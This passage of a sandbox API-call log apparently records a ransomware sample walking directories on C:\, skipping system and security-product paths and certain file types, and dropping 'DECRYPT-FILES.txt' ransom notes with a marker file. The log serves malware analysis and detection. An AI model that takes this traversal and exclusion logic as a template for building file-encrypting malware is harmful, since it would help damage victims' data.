lpString1="ProgramData\\") returned="ProgramData\\" [0179.727] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0179.727] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="\\Program Files") returned 0x0 [0179.727] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch=":\\Windows") returned 0x0 [0179.727] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="\\Games\\") returned 0x0 [0179.727] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.727] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="\\ProgramData\\") returned="\\ProgramData\\" [0179.728] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0179.728] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0179.728] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0179.728] lstrcatW (in: lpString1="Recovery", lpString2="\\" | out: lpString1="Recovery\\") returned="Recovery\\" [0179.728] lstrcatW (in: lpString1="C:\\", lpString2="Recovery\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Program Files") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch=":\\Windows") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Games\\") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\All Users") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="AhnLab") returned 0x0 [0179.728] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.728] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0179.728] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.728] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Recovery\\\\0a16c9.tmp") returned 23 [0179.728] CreateFileW (lpFileName="C:\\Recovery\\\\0a16c9.tmp" (normalized: "c:\\recovery\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.728] GetLastError () returned 0x5 [0179.728] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0179.728] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.728] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Recovery\\\\DECRYPT-FILES.txt") returned 30 [0179.729] CreateFileW (lpFileName="C:\\Recovery\\\\DECRYPT-FILES.txt" (normalized: "c:\\recovery\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.729] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0179.729] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*" | out: lpString1="C:\\Recovery\\*") returned="C:\\Recovery\\*" [0179.729] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar\\", cAlternateFileName="苟眔酯ﲨͯ")) returned 0xffffffff [0179.729] CloseHandle (hObject=0xffffffff) returned 0 [0179.729] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa68fc2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa68fc2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0179.729] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0179.729] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0179.729] lstrcatW (in: lpString1="System Volume Information", lpString2="\\" | out: lpString1="System Volume Information\\") returned="System Volume Information\\" [0179.729] lstrcatW (in: lpString1="C:\\", lpString2="System Volume Information\\" | out: lpString1="C:\\System Volume Information\\") returned="C:\\System Volume Information\\" [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Program Files") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch=":\\Windows") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Games\\") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\All Users") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="AhnLab") returned 0x0 [0179.729] StrStrW (lpFirst="C:\\System Volume Information\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.729] lstrlenW (lpString="C:\\System Volume Information\\") returned 29 [0179.729] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.729] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\System Volume Information\\\\0a16c9.tmp") returned 40 [0179.729] CreateFileW (lpFileName="C:\\System Volume Information\\\\0a16c9.tmp" (normalized: "c:\\system volume information\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.730] GetLastError () returned 0x5 [0179.730] lstrlenW (lpString="C:\\System Volume Information\\") returned 29 [0179.730] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.730] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\System Volume Information\\\\DECRYPT-FILES.txt") returned 47 [0179.730] CreateFileW (lpFileName="C:\\System Volume Information\\\\DECRYPT-FILES.txt" (normalized: "c:\\system volume information\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.730] lstrlenW (lpString="C:\\System Volume Information\\") returned 29 [0179.730] lstrcatW (in: lpString1="C:\\System Volume Information\\", lpString2="*" | out: lpString1="C:\\System Volume Information\\*") returned="C:\\System Volume Information\\*" [0179.730] FindFirstFileW (in: lpFileName="C:\\System Volume Information\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar\\", cAlternateFileName="苟眔酯ﲨͯ")) returned 0xffffffff [0179.730] CloseHandle (hObject=0xffffffff) returned 0 [0179.730] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb1f618a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb1f618a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0179.730] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0179.730] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0179.730] lstrcatW (in: lpString1="Users", lpString2="\\" | out: lpString1="Users\\") returned="Users\\" [0179.730] lstrcatW (in: lpString1="C:\\", lpString2="Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Program Files") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch=":\\Windows") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Games\\") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\All Users") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="AhnLab") returned 0x0 [0179.730] StrStrW (lpFirst="C:\\Users\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.731] lstrlenW (lpString="C:\\Users\\") returned 9 [0179.731] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.731] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Users\\\\0a16c9.tmp") returned 20 [0179.731] CreateFileW (lpFileName="C:\\Users\\\\0a16c9.tmp" (normalized: "c:\\users\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.731] GetLastError () returned 0x5 [0179.731] lstrlenW (lpString="C:\\Users\\") returned 9 [0179.731] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.731] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Users\\\\DECRYPT-FILES.txt") returned 27 [0179.731] CreateFileW (lpFileName="C:\\Users\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.731] lstrlenW (lpString="C:\\Users\\") returned 9 [0179.731] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*" | out: lpString1="C:\\Users\\*") returned="C:\\Users\\*" [0179.731] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb1f618a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb1f618a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479738 [0179.731] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.731] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb1f618a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb1f618a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.731] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.731] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.731] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc5d7160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xdc5d7160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0179.731] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0179.731] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0179.731] lstrcatW (in: lpString1="5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0179.731] lstrcatW (in: lpString1="C:\\Users\\", lpString2="5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0179.731] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Program Files") returned 0x0 [0179.731] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch=":\\Windows") returned 0x0 [0179.731] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Games\\") returned 0x0 [0179.731] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.731] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.731] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.732] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.732] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.732] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\All Users") returned 0x0 [0179.732] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.732] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.732] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.732] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="AhnLab") returned 0x0 [0179.732] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.732] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0179.732] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.732] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\\\0a16c9.tmp") returned 41 [0179.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x24c [0179.733] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0179.733] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.733] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\\\DECRYPT-FILES.txt") returned 48 [0179.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.734] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0179.734] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0179.734] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee402da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee402da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.734] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.734] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee402da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee402da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.734] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.734] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.734] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee402da0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee402da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee402da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.734] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.735] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.735] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.735] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.735] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.735] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.735] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.735] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0179.735] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.735] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0179.735] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\0a16c9.tmp" [0179.735] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.735] CloseHandle (hObject=0x0) returned 0 [0179.735] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.735] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad75ff20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0179.735] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0179.735] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0179.736] lstrcatW (in: lpString1="AppData", lpString2="\\" | out: lpString1="AppData\\") returned="AppData\\" [0179.736] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="AppData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Program Files") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch=":\\Windows") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Games\\") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\All Users") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="AhnLab") returned 0x0 [0179.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.736] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 38 [0179.736] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.737] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\\\0a16c9.tmp") returned 49 [0179.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0179.739] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 38 [0179.739] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.739] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS 